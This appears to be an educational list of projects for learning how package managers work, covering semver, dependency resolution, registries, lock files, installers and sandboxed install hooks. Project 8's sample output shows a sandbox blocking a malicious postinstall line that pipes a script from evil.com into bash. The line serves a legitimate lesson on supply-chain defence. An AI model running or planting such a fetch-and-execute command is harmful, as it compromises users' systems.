← Back to all projects

PACKAGE MANAGER INTERNALS PROJECTS

Package Manager Internals: From Magic to Mastery

Goal: Understand how package managers (npm, Cargo, Homebrew, pip) work by building progressively complex components that exercise each fundamental concept.

Core Concepts You’ll Master

Package managers solve several interconnected problems:

  1. Version Parsing & Comparison - Understanding semver, comparing 1.2.3 vs 1.2.4-beta.1
  2. Constraint Satisfaction - Finding versions that satisfy ^1.2.0 AND >=1.1.5 <2.0.0
  3. Dependency Resolution - The NP-complete problem of finding compatible versions for an entire graph
  4. Registry Protocols - HTTP APIs, package metadata (“packuments”), tarballs
  5. Lock Files - Reproducible builds, integrity hashes
  6. Installation & Linking - Cellar/node_modules structures, symlinks, PATH management
  7. Caching - Avoiding re-downloads, content-addressable storage
  8. Security - Checksums, signatures, supply chain integrity

Project 1: Semver Parser & Comparator

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Rust
  • Alternative Programming Languages: C, Go, TypeScript
  • Coolness Level: Level 2: Practical but Forgettable
  • Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Parsing / String Processing
  • Software or Tool: Semver Library
  • Main Book: “Language Implementation Patterns” by Terence Parr

What you’ll build: A complete semver library that parses version strings (1.2.3-alpha.1+build.456), compares them, and evaluates range constraints (^1.2.0, >=1.0.0 <2.0.0, ~1.2.3).

Why it teaches package managers: Every package manager operation starts with parsing and comparing versions. When npm decides whether lodash@4.17.21 satisfies ^4.0.0, it’s using exactly this logic. You’ll understand why 1.0.0-alpha < 1.0.0 and how pre-release identifiers work.

Core challenges you’ll face:

  • Tokenizing version strings (split on ., -, +) → maps to lexical analysis
  • Handling pre-release precedence (1.0.0-alpha.1 vs 1.0.0-alpha.2 vs 1.0.0) → maps to comparison algorithms
  • Parsing range expressions (>=1.2.0 <2.0.0 || 3.x) → maps to recursive descent parsing
  • Operator semantics (difference between ^, ~, >=, *) → maps to domain modeling

Key Concepts:

  • Lexical Analysis: “Language Implementation Patterns” Chapter 2 - Terence Parr
  • Semantic Versioning Spec: semver.org specification - Official Spec
  • Comparison Algorithms: “Algorithms, Fourth Edition” Chapter 2 (Sorting) - Sedgewick & Wayne
  • Recursive Descent Parsing: “Writing a C Compiler” Chapter 1 - Nora Sandler

Difficulty: Intermediate Time estimate: Weekend Prerequisites: Basic parsing concepts, string manipulation

Real world outcome:

$ ./semver compare 1.2.3 1.2.4
1.2.3 < 1.2.4

$ ./semver satisfies 1.2.3 "^1.0.0"
✓ 1.2.3 satisfies ^1.0.0

$ ./semver satisfies 2.0.0 "^1.0.0"
✗ 2.0.0 does NOT satisfy ^1.0.0 (major version mismatch)

$ ./semver parse 1.2.3-alpha.1+build.456
Version {
  major: 1,
  minor: 2,
  patch: 3,
  prerelease: ["alpha", 1],
  build: ["build", 456]
}

Implementation Hints:

  • Start by parsing just X.Y.Z before handling pre-release/build metadata
  • The range operators have specific meanings: ^ allows minor/patch changes, ~ allows only patch changes, * and x are wildcards
  • Pre-release versions have lower precedence than the associated normal version
  • Build metadata should be ignored when comparing versions (per spec section 10)

Learning milestones:

  1. Parse and compare basic versions → You understand tokenization
  2. Handle pre-release ordering correctly → You understand semver semantics
  3. Evaluate complex range expressions → You can build expression parsers

Project 2: Dependency Graph Builder & Cycle Detector

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Rust, Go, TypeScript
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Graph Algorithms / Data Structures
  • Software or Tool: Dependency Analyzer
  • Main Book: “Algorithms, Fourth Edition” by Robert Sedgewick and Kevin Wayne

What you’ll build: A tool that reads package manifest files (package.json, Cargo.toml, or your own format), builds a directed dependency graph, detects cycles, and outputs a topological installation order.

Why it teaches package managers: Before resolving versions, package managers must understand the shape of dependencies. Circular dependencies are forbidden (or require special handling). Installation must happen in dependency order—you can’t build express before its dependencies exist.

Core challenges you’ll face:

  • Parsing manifest files (JSON/TOML) → maps to file I/O and parsing
  • Building adjacency lists (package → [dependencies]) → maps to graph representation
  • DFS-based cycle detection (finding back edges) → maps to graph traversal
  • Topological sorting (installation order) → maps to graph algorithms
  • Transitive dependency expansion (A→B→C means A needs C) → maps to graph closure

Key Concepts:

  • Graph Representations: “Algorithms, Fourth Edition” Chapter 4.1 - Sedgewick & Wayne
  • Depth-First Search: “Algorithms, Fourth Edition” Chapter 4.1 - Sedgewick & Wayne
  • Topological Sort: “Algorithms, Fourth Edition” Chapter 4.2 - Sedgewick & Wayne
  • Cycle Detection: “Grokking Algorithms” Chapter 6 - Aditya Bhargava

Difficulty: Intermediate Time estimate: Weekend Prerequisites: Basic graph theory, DFS/BFS understanding

Real world outcome:

$ ./depgraph analyze ./my-project

Dependency Graph:
my-app
├── express@^4.0.0
│   ├── body-parser@^1.0.0
│   │   └── bytes@^3.0.0
│   └── accepts@^1.0.0
└── lodash@^4.17.0

Total packages: 5
Max depth: 3

$ ./depgraph check-cycles ./circular-project
⚠️  Circular dependency detected!
   package-a → package-b → package-c → package-a

$ ./depgraph install-order ./my-project
Installation order:
1. bytes@^3.0.0
2. body-parser@^1.0.0
3. accepts@^1.0.0
4. lodash@^4.17.0
5. express@^4.0.0
6. my-app

Implementation Hints:

  • Use a dictionary/hashmap where keys are package names and values are lists of dependency names
  • For cycle detection, maintain three states during DFS: unvisited, in-progress, completed
  • A cycle exists if you visit a node that’s currently “in-progress” (a back edge)
  • Topological sort is just the reverse of DFS post-order traversal
  • Consider using Kahn’s algorithm (BFS-based) as an alternative approach

Learning milestones:

  1. Build and visualize dependency graphs → You understand graph representation
  2. Detect circular dependencies → You understand DFS traversal states
  3. Generate correct installation order → You understand topological sorting

Project 3: Version Constraint SAT Solver

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Rust, Haskell, OCaml
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
  • Difficulty: Level 4: Expert
  • Knowledge Area: Constraint Satisfaction / Logic
  • Software or Tool: Dependency Resolver
  • Main Book: “The Art of Computer Programming, Volume 4, Fascicle 6: Satisfiability” by Donald E. Knuth

What you’ll build: A dependency resolver that translates version constraints into boolean satisfiability (SAT) clauses and uses a solver (either your own DPLL implementation or an off-the-shelf solver like PicoSAT) to find compatible versions.

Why it teaches package managers: This is the heart of modern package managers. When you have A requires B>=1.0.0 and C requires B<1.5.0 and D requires B>=1.3.0, finding B@1.4.0 is a SAT problem. Understanding this reveals why “dependency hell” is NP-complete and why resolvers sometimes take a long time.

Core challenges you’ll face:

  • Encoding constraints as CNF (Conjunctive Normal Form) → maps to propositional logic
  • At-most-one constraints (only one version of each package) → maps to cardinality constraints
  • Implementing DPLL algorithm (unit propagation, pure literal elimination) → maps to backtracking search
  • Conflict analysis and learning (why did this fail?) → maps to debugging resolution failures
  • Extracting solutions (boolean assignment → version selection) → maps to solution decoding

Resources for key challenges:

Key Concepts:

  • SAT Problem Definition: “The Art of Computer Programming, Vol 4 Fascicle 6” - Donald Knuth
  • DPLL Algorithm: Wikipedia: DPLL Algorithm - Classic backtracking SAT solver
  • CNF Conversion: “Concrete Mathematics” Chapter 4 - Graham, Knuth, Patashnik
  • Constraint Propagation: “Algorithms, Fourth Edition” Chapter 6 (Context) - Sedgewick & Wayne

Difficulty: Expert Time estimate: 2-4 weeks Prerequisites: Propositional logic, backtracking algorithms, semver (Project 1)

Real world outcome:

$ cat requirements.txt
web-framework >= 2.0.0
database-driver ^1.5.0
logger >= 1.0.0 < 3.0.0

# web-framework 2.0.0 requires logger ^2.0.0
# database-driver 1.5.0 requires logger >= 1.5.0

$ ./resolver solve requirements.txt

Resolving dependencies...
  - web-framework: 6 versions available
  - database-driver: 4 versions available
  - logger: 12 versions available

Encoding as SAT problem...
  - 22 variables (one per package-version pair)
  - 156 clauses

Running DPLL solver...
  - Propagations: 47
  - Decisions: 3
  - Conflicts: 1
  - Learned clauses: 1

✓ Solution found:
  web-framework@2.1.0
  database-driver@1.5.2
  logger@2.3.0

$ ./resolver solve impossible-requirements.txt
✗ No solution exists!
  Conflict: web-framework@2.0.0 requires logger>=2.0.0
            but old-lib@1.0.0 requires logger<2.0.0

Implementation Hints:

  • Start with a brute-force solver (try all combinations) before optimizing with DPLL
  • Each package-version pair becomes a boolean variable (e.g., lodash_4_17_0)
  • “At most one version per package” becomes pairwise exclusion clauses: ¬lodash_4_17_0 ∨ ¬lodash_4_16_0
  • Dependencies become implications: express_4_0_0 → (body_parser_1_0_0 ∨ body_parser_1_1_0 ∨ ...)
  • Consider using Python’s python-sat library for a production solver, but implement basic DPLL yourself first

Learning milestones:

  1. Encode simple constraints as SAT → You understand the reduction
  2. Implement basic DPLL with unit propagation → You understand SAT solving
  3. Handle conflicts and report useful errors → You understand why resolution fails
  4. Solve real-world dependency graphs quickly → You understand optimization

Project 4: Package Registry Client

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Go
  • Alternative Programming Languages: Rust, Python, TypeScript
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Networking / HTTP APIs
  • Software or Tool: npm/crates.io Client
  • Main Book: “TCP/IP Illustrated, Volume 1” by W. Richard Stevens

What you’ll build: A client that talks to the npm registry (or crates.io) to fetch package metadata, download tarballs, verify checksums, and cache results locally.

Why it teaches package managers: This is how npm install actually gets packages. You’ll learn the registry protocol, understand why there’s both a “full” and “abbreviated” metadata format, and see how checksums ensure integrity.

Core challenges you’ll face:

  • HTTP client with proper headers (User-Agent, Accept) → maps to protocol compliance
  • Parsing “packument” JSON (package metadata format) → maps to API schemas
  • Downloading and extracting tarballs (.tgz files) → maps to file formats
  • Verifying SHA-512 integrity hashes → maps to security
  • Implementing a local cache (avoid re-downloads) → maps to caching strategies

Resources for key challenges:

Key Concepts:

  • HTTP Protocol: “TCP/IP Illustrated, Volume 1” Chapter 14 - W. Richard Stevens
  • REST API Design: “Design and Build Great Web APIs” Chapter 3 - Mike Amundsen
  • Checksums & Integrity: “Serious Cryptography, 2nd Edition” Chapter 5 - Jean-Philippe Aumasson
  • Caching Strategies: “Designing Data-Intensive Applications” Chapter 5 - Martin Kleppmann

Difficulty: Intermediate Time estimate: 1 week Prerequisites: HTTP basics, JSON parsing, file I/O

Real world outcome:

$ ./registry-client info lodash

Package: lodash
Latest: 4.17.21
Description: Lodash modular utilities
License: MIT
Repository: https://github.com/lodash/lodash
Versions: 114 published

$ ./registry-client download lodash 4.17.21

Fetching metadata from https://registry.npmjs.org/lodash
Found version 4.17.21
  Tarball: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
  Size: 308,599 bytes
  SHA-512: CAMj...

Downloading...  [████████████████████] 100%

Verifying integrity...
  Expected: sha512-CAMj...
  Actual:   sha512-CAMj...
  ✓ Integrity verified

Extracting to ./cache/lodash-4.17.21/
  ✓ 1,057 files extracted

$ ./registry-client search "http client"
Results for "http client":
1. axios (104M weekly downloads) - Promise based HTTP client
2. node-fetch (67M weekly downloads) - A light-weight module
3. got (23M weekly downloads) - Human-friendly HTTP request library

Implementation Hints:

  • The npm registry base URL is https://registry.npmjs.org
  • Fetch metadata with GET /package-name (full) or GET /package-name/version (specific version)
  • The dist field in version metadata contains tarball URL and integrity hash
  • Use Accept: application/vnd.npm.install-v1+json header for abbreviated metadata
  • For crates.io, the protocol is different—it uses a git-based index at https://github.com/rust-lang/crates.io-index
  • Implement ETag-based caching to avoid re-downloading unchanged metadata

Learning milestones:

  1. Fetch and parse package metadata → You understand the registry protocol
  2. Download and verify tarballs → You understand integrity checking
  3. Implement caching with ETags → You understand efficient API usage

Project 5: Lock File Generator

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Rust
  • Alternative Programming Languages: Go, Python, TypeScript
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Reproducible Builds / Hashing
  • Software or Tool: Lock File System
  • Main Book: “Designing Data-Intensive Applications” by Martin Kleppmann

What you’ll build: A system that, after dependency resolution, generates a lock file recording exact versions, download URLs, and integrity hashes—then can reinstall from the lock file without re-resolving.

Why it teaches package managers: Lock files are why npm ci and cargo build are deterministic. Without them, builds are non-reproducible. You’ll understand the difference between “loose” requirements (package.json) and “locked” reality (package-lock.json).

Core challenges you’ll face:

  • Capturing resolved state (exact versions, not ranges) → maps to state serialization
  • Recording integrity hashes (SHA-512 for each package) → maps to content-addressable storage
  • Detecting lock file staleness (manifest changed since lock) → maps to change detection
  • Partial updates (add one package without re-resolving everything) → maps to incremental computation
  • Cross-platform reproducibility (same lock file, same result everywhere) → maps to deterministic builds

Key Concepts:

  • Content Addressing: “Designing Data-Intensive Applications” Chapter 3 - Martin Kleppmann
  • Cryptographic Hashes: “Serious Cryptography, 2nd Edition” Chapter 5 - Aumasson
  • Reproducible Builds: reproducible-builds.org - Community standard
  • JSON/TOML Serialization: “Fluent Python” Chapter 4 (for concepts) - Luciano Ramalho

Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Projects 1-4 (semver, graphs, resolver, registry client)

Real world outcome:

$ cat mypackage.toml
[dependencies]
web-framework = "^2.0.0"
database = "^1.5.0"

$ ./lockgen generate mypackage.toml

Resolving dependencies...
Fetching package metadata...
Generating lock file...

✓ Created mypackage.lock

$ cat mypackage.lock
# Auto-generated lock file. Do not edit.
# Generated: 2025-01-15T10:30:00Z

[[package]]
name = "web-framework"
version = "2.1.3"
source = "https://registry.example.com/web-framework-2.1.3.tgz"
integrity = "sha512-abc123..."
dependencies = ["logger@2.0.0"]

[[package]]
name = "logger"
version = "2.0.0"
source = "https://registry.example.com/logger-2.0.0.tgz"
integrity = "sha512-def456..."
dependencies = []

[[package]]
name = "database"
version = "1.5.2"
source = "https://registry.example.com/database-1.5.2.tgz"
integrity = "sha512-ghi789..."
dependencies = []

$ ./lockgen install --from-lock mypackage.lock

Installing from lock file (no resolution needed)...
  ✓ logger@2.0.0 (cached)
  ✓ web-framework@2.1.3 (downloading...)
  ✓ database@1.5.2 (cached)

All packages installed. Integrity verified.

$ ./lockgen check mypackage.toml mypackage.lock
✓ Lock file is up-to-date with manifest

Implementation Hints:

  • The lock file should contain: package name, exact version, download URL, integrity hash, and resolved dependencies
  • Use SHA-512 (like npm) or SHA-256 (like Cargo) for integrity hashes
  • Detect staleness by hashing the manifest file and storing that hash in the lock file
  • For partial updates, only re-resolve the changed subtree of the dependency graph
  • Consider supporting both JSON and TOML formats (npm uses JSON, Cargo uses TOML)

Learning milestones:

  1. Generate lock files after resolution → You understand state capture
  2. Install purely from lock file → You understand reproducibility
  3. Detect and handle manifest changes → You understand incremental updates

Project 6: Cellar-Style Package Installer

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Rust, Go, Python
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Filesystem / Symlinks
  • Software or Tool: Package Installer (Homebrew-style)
  • Main Book: “The Linux Programming Interface” by Michael Kerrisk

What you’ll build: An installer that extracts packages into versioned directories (like Homebrew’s Cellar: /usr/local/Cellar/pkg/1.2.3/) and creates symlinks to a common prefix (/usr/local/bin/), supporting multiple versions and atomic switching.

Why it teaches package managers: This is how Homebrew achieves clean installs, easy rollbacks, and multiple versions. You’ll understand why symlinks are powerful, how PATH works, and why “just copying files” isn’t enough.

Core challenges you’ll face:

  • Versioned directory structure (Cellar layout) → maps to filesystem organization
  • Creating relative symlinks (portable across machines) → maps to symlink mechanics
  • Atomic version switching (switch from v1.0 to v2.0 safely) → maps to atomic operations
  • Handling conflicts (two packages provide same binary) → maps to conflict resolution
  • Uninstallation without orphans (clean removal) → maps to reference tracking

Key Concepts:

  • Symlinks & Hard Links: “The Linux Programming Interface” Chapter 18 - Michael Kerrisk
  • Atomic File Operations: “The Linux Programming Interface” Chapter 5 - Michael Kerrisk
  • Filesystem Hierarchy: “How Linux Works, 3rd Edition” Chapter 4 - Brian Ward
  • Homebrew Architecture: Formula Cookbook - Official docs

Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Filesystem operations, symlink concepts, shell/PATH understanding

Real world outcome:

$ ./cellar install ./packages/vim-9.0.0.tgz

Installing vim@9.0.0...
  Creating /usr/local/Cellar/vim/9.0.0/
  Extracting 127 files...

Linking vim@9.0.0...
  /usr/local/bin/vim → ../Cellar/vim/9.0.0/bin/vim
  /usr/local/bin/vimdiff → ../Cellar/vim/9.0.0/bin/vimdiff
  /usr/local/share/man/man1/vim.1 → ../../Cellar/vim/9.0.0/share/man/man1/vim.1

✓ vim@9.0.0 installed and linked

$ ls -la /usr/local/bin/vim
lrwxr-xr-x  1 user  staff  ../Cellar/vim/9.0.0/bin/vim

$ ./cellar install ./packages/vim-9.1.0.tgz

Installing vim@9.1.0...
  ✓ Installed to /usr/local/Cellar/vim/9.1.0/

Switching vim 9.0.0 → 9.1.0...
  Unlinking 9.0.0...
  Linking 9.1.0...
  ✓ Switched

$ ./cellar list
vim 9.0.0 (unlinked)
vim 9.1.0 (linked)$ ./cellar switch vim 9.0.0
Switching vim 9.1.0 → 9.0.0...
  ✓ Now using vim@9.0.0

$ ./cellar uninstall vim 9.0.0
Uninstalling vim@9.0.0...
  Removing /usr/local/Cellar/vim/9.0.0/ (127 files)
  ✓ Removed

Implementation Hints:

  • Cellar structure: $PREFIX/Cellar/$NAME/$VERSION/{bin,lib,share,...}
  • Always use relative symlinks (../Cellar/...) not absolute (/usr/local/Cellar/...) for portability
  • Use symlink() system call (or language equivalent) to create links
  • For atomic switching, create new links with temporary names, then rename() over old links
  • Track installed files in a manifest (e.g., /Cellar/vim/9.0.0/.MANIFEST) for clean uninstall
  • Handle the case where /usr/local/bin/ doesn’t exist yet

Learning milestones:

  1. Install to versioned directories → You understand Cellar structure
  2. Create and manage symlinks → You understand the linking layer
  3. Atomically switch versions → You understand transactional installs
  4. Clean uninstall with no orphans → You understand reference tracking

Project 7: node_modules Hoisting Simulator

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: TypeScript
  • Alternative Programming Languages: Python, Go, Rust
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Tree Algorithms / Package Layout
  • Software or Tool: npm/pnpm Simulator
  • Main Book: “Data Structures the Fun Way” by Jeremy Kubica

What you’ll build: A tool that takes a resolved dependency graph and produces an optimized node_modules layout, demonstrating npm’s hoisting algorithm and pnpm’s content-addressable approach.

Why it teaches package managers: npm’s node_modules structure is famously complex. Why is it often 500MB? Why do you sometimes get duplicate packages? Why does pnpm use symlinks differently? This project reveals the tradeoffs.

Core challenges you’ll face:

  • Hoisting algorithm (move deps up when possible) → maps to tree optimization
  • Handling duplicate versions (when hoisting fails) → maps to space vs correctness tradeoff
  • Phantom dependencies (accessing unhoisted packages) → maps to encapsulation violations
  • pnpm’s content-addressable store (hardlinks to global cache) → maps to deduplication
  • Flat vs nested layouts (yarn vs npm v2 vs npm v7) → maps to algorithm comparison

Key Concepts:

  • Tree Traversal: “Data Structures the Fun Way” Chapter 6 - Jeremy Kubica
  • npm Hoisting: npm docs: how npm3 works - Official npm docs
  • pnpm’s Approach: pnpm.io/motivation - Why pnpm exists
  • Content-Addressable Storage: “Designing Data-Intensive Applications” Chapter 3 - Martin Kleppmann

Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Tree data structures, npm/node basics

Real world outcome:

$ cat resolved-deps.json
{
  "my-app": {
    "deps": {
      "express": "4.18.0",
      "lodash": "4.17.21"
    }
  },
  "express": {
    "deps": {
      "body-parser": "1.20.0",
      "lodash": "4.17.21"
    }
  },
  "body-parser": {
    "deps": {
      "lodash": "4.17.15"
    }
  }
}

$ ./hoister simulate --algorithm=npm resolved-deps.json

npm-style Layout (hoisted):
node_modules/
├── express/
├── lodash/ (4.17.21, hoisted)
├── body-parser/
│   └── node_modules/
│       └── lodash/ (4.17.15, nested - conflicts with hoisted)
└── .package-lock.json

Analysis:
  Total packages: 4
  Hoisted: 3
  Nested duplicates: 1 (lodash has conflicting versions)
  Disk usage: ~2.1 MB

$ ./hoister simulate --algorithm=pnpm resolved-deps.json

pnpm-style Layout (symlinks + store):
node_modules/
├── .pnpm/
│   ├── express@4.18.0/
│   │   └── node_modules/
│   │       ├── express/ → <hardlink to store>
│   │       ├── body-parser/ → ../../body-parser@1.20.0/...
│   │       └── lodash/ → ../../lodash@4.17.21/...
│   ├── body-parser@1.20.0/
│   │   └── node_modules/
│   │       ├── body-parser/ → <hardlink to store>
│   │       └── lodash/ → ../../lodash@4.17.15/...
│   ├── lodash@4.17.21/
│   └── lodash@4.17.15/
├── express/ → .pnpm/express@4.18.0/node_modules/express
└── lodash/ → .pnpm/lodash@4.17.21/node_modules/lodash

Analysis:
  Total packages: 4
  Store entries: 4 (deduplicated globally)
  Disk usage: ~1.8 MB (shared across projects)
  No phantom dependency access possible ✓

Implementation Hints:

  • npm hoisting: for each package, try to place it at the highest possible level where no version conflict exists
  • A conflict occurs when two versions of the same package would occupy the same path
  • pnpm creates a flat store (.pnpm/name@version/) and symlinks from nested node_modules
  • The key insight: pnpm’s layout enforces that packages can only access their declared dependencies
  • Consider also implementing Yarn’s plug’n’play (PnP) layout which avoids node_modules entirely

Learning milestones:

  1. Implement basic hoisting → You understand npm’s approach
  2. Handle version conflicts correctly → You understand why duplicates exist
  3. Implement pnpm’s symlink layout → You understand the alternative
  4. Compare disk usage and access patterns → You understand the tradeoffs

Project 8: Build Script Executor (Pre/Post Install Hooks)

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Go
  • Alternative Programming Languages: Rust, Python, Node.js
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Process Management / Security
  • Software or Tool: Install Hook Runner
  • Main Book: “The Linux Programming Interface” by Michael Kerrisk

What you’ll build: A sandboxed executor for package install scripts (preinstall, postinstall, etc.) that runs build commands, handles native compilation, and implements security policies.

Why it teaches package managers: Many packages need to compile native extensions (like node-gyp for C++ addons) or run setup scripts. This is also a major security vector—malicious packages have used postinstall scripts for attacks. You’ll understand both the necessity and the danger.

Core challenges you’ll face:

  • Running child processes (spawn, wait, capture output) → maps to process management
  • Environment variable setup (PATH, npm_config_, etc.) → maps to *environment configuration
  • Handling native builds (detecting compiler, platform-specific flags) → maps to build systems
  • Sandboxing for security (limit filesystem/network access) → maps to security policies
  • Timeout and resource limits (prevent runaway scripts) → maps to resource management

Key Concepts:

  • Process Creation: “The Linux Programming Interface” Chapter 24-26 - Michael Kerrisk
  • Environment Variables: “The Linux Programming Interface” Chapter 6 - Michael Kerrisk
  • Sandboxing: “Linux Basics for Hackers” Chapter 14 - OccupyTheWeb
  • Supply Chain Security: Socket.dev blog on npm security - Current research

Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Process management, shell scripting, security basics

Real world outcome:

$ cat package.json
{
  "name": "native-addon",
  "scripts": {
    "preinstall": "echo 'Checking system requirements...'",
    "install": "node-gyp rebuild",
    "postinstall": "node ./setup.js"
  }
}

$ ./script-runner execute ./package.json --phase=install

[preinstall] Running: echo 'Checking system requirements...'
[preinstall] Checking system requirements...
[preinstall] ✓ Completed in 0.01s

[install] Running: node-gyp rebuild
[install] Setting up environment...
[install]   CC=/usr/bin/clang
[install]   CXX=/usr/bin/clang++
[install]   npm_config_node_gyp=/usr/local/lib/node_modules/node-gyp
[install] Compiling native addon...
[install] gyp info spawn clang++
[install] gyp info spawn args ['-fPIC', '-shared', '-o', 'build/Release/addon.node', ...]
[install] ✓ Completed in 4.2s

[postinstall] Running: node ./setup.js
[postinstall] Creating configuration file...
[postinstall] ✓ Completed in 0.3s

All scripts completed successfully.

$ ./script-runner execute ./malicious-package --sandbox

[postinstall] Running: curl evil.com/steal.sh | bash
[postinstall] ⚠️  BLOCKED: Network access denied (sandbox policy)
[postinstall] ✗ Script terminated

Security report:
  Attempted network connections: 1 (blocked)
  Attempted filesystem writes outside package: 0

Recommendation: Review this package before installing with --ignore-scripts

Implementation Hints:

  • Use os/exec (Go), subprocess (Python), or std::process::Command (Rust) for spawning
  • Set up environment variables like npm_package_name, npm_lifecycle_event, PATH (including node_modules/.bin)
  • For sandboxing on Linux, consider using seccomp, namespaces, or running in a container
  • On macOS, use sandbox-exec with a profile that restricts network and filesystem
  • Implement timeouts with context.WithTimeout (Go) or similar
  • Capture both stdout and stderr, stream them with prefixes for visibility

Learning milestones:

  1. Execute lifecycle scripts in order → You understand npm’s script phases
  2. Set up proper build environment → You understand native compilation
  3. Implement basic sandboxing → You understand security concerns
  4. Handle failures and timeouts gracefully → You understand robustness

Project 9: Private Registry Server

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Go
  • Alternative Programming Languages: Rust, Python, TypeScript
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 4. The “Open Core” Infrastructure
  • Difficulty: Level 3: Advanced
  • Knowledge Area: HTTP Servers / APIs
  • Software or Tool: Private npm/Cargo Registry
  • Main Book: “Designing Data-Intensive Applications” by Martin Kleppmann

What you’ll build: A private package registry server compatible with npm or Cargo that can host internal packages, proxy to public registries (with caching), and handle publishing with authentication.

Why it teaches package managers: You’ll understand the server side—how registries store metadata, serve tarballs, handle authentication, and why companies run private registries for proprietary code. This is the complement to Project 4 (registry client).

Core challenges you’ll face:

  • Implementing the registry API (GET /package, PUT /-/package) → maps to API design
  • Storing package metadata (database or filesystem) → maps to data persistence
  • Proxying to upstream registries (npmjs.org) with caching → maps to caching proxies
  • Authentication and authorization (tokens, scopes) → maps to security
  • Handling package publishing (upload, validate, store) → maps to write APIs

Resources for key challenges:

Key Concepts:

  • HTTP Server Design: “Design and Build Great Web APIs” Chapter 5 - Mike Amundsen
  • Caching Proxies: “Designing Data-Intensive Applications” Chapter 5 - Martin Kleppmann
  • Authentication Patterns: “Foundations of Information Security” Chapter 7 - Jason Andress
  • Content-Addressable Storage: “Designing Data-Intensive Applications” Chapter 3 - Kleppmann

Difficulty: Advanced Time estimate: 2-3 weeks Prerequisites: HTTP server development, database basics, authentication

Real world outcome:

# Start your private registry
$ ./registry-server --port 4873 --storage ./packages --upstream https://registry.npmjs.org

Private Registry Server
  Listening: http://localhost:4873
  Storage: ./packages (142 cached packages)
  Upstream: https://registry.npmjs.org (proxy enabled)

# Configure npm to use your registry
$ npm config set registry http://localhost:4873

# Install a public package (proxied and cached)
$ npm install lodash

[registry] GET /lodash
[registry] Cache miss - proxying to upstream
[registry] Caching lodash@4.17.21 (308KB)
[registry] 200 OK (1.2s)

# Install same package again (served from cache)
$ npm install lodash

[registry] GET /lodash
[registry] Cache hit ✓
[registry] 200 OK (12ms)

# Publish a private package
$ npm publish ./my-internal-lib

[registry] PUT /-/package/my-internal-lib
[registry] Authenticated: token=npm_xxx...
[registry] Validating package...
[registry] Storing my-internal-lib@1.0.0 (24KB)
[registry] 201 Created

# Search private packages
$ curl http://localhost:4873/-/v1/search?text=my-internal
{
  "objects": [{
    "package": {
      "name": "my-internal-lib",
      "version": "1.0.0",
      "private": true
    }
  }]
}

Implementation Hints:

  • For npm compatibility, implement these endpoints: GET /:package, GET /:package/:version, PUT /:package, GET /-/v1/search
  • Store metadata as JSON files: storage/package-name/package.json
  • Store tarballs: storage/package-name/package-name-version.tgz
  • For proxying, first check local storage, then fetch from upstream and cache
  • Use bearer token authentication matching npm’s format
  • Consider using SQLite for metadata and filesystem for tarballs for simplicity

Learning milestones:

  1. Serve package metadata and tarballs → You understand the read API
  2. Proxy and cache from upstream → You understand caching registries
  3. Handle publishing with auth → You understand the write API
  4. Support search and listing → You understand registry discovery

Project 10: Virtual Environment Manager

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Rust
  • Alternative Programming Languages: Go, Python, C
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Environment Isolation / Shells
  • Software or Tool: venv/virtualenv Clone
  • Main Book: “The Linux Programming Interface” by Michael Kerrisk

What you’ll build: A tool that creates isolated environments with their own bin/, lib/, and package directories, activates/deactivates them by modifying PATH, and ensures packages installed in one env don’t affect another.

Why it teaches package managers: Python’s virtualenv, Ruby’s rbenv, Node’s nvm—all solve the “multiple projects, different versions” problem. You’ll understand how environment isolation actually works (it’s mostly PATH manipulation and symlinks).

Core challenges you’ll face:

  • Creating isolated directory structures → maps to filesystem organization
  • Generating activation scripts (bash, zsh, fish) → maps to shell integration
  • PATH manipulation (prepend env’s bin/) → maps to environment variables
  • Isolating package installations (pip install goes to env) → maps to tool configuration
  • Detecting current environment (which env am I in?) → maps to state tracking

Key Concepts:

  • Environment Variables: “The Linux Programming Interface” Chapter 6 - Michael Kerrisk
  • Shell Scripting: “Effective Shell” Chapters 15-20 - Dave Kerr
  • Python’s venv: venv documentation - Reference implementation
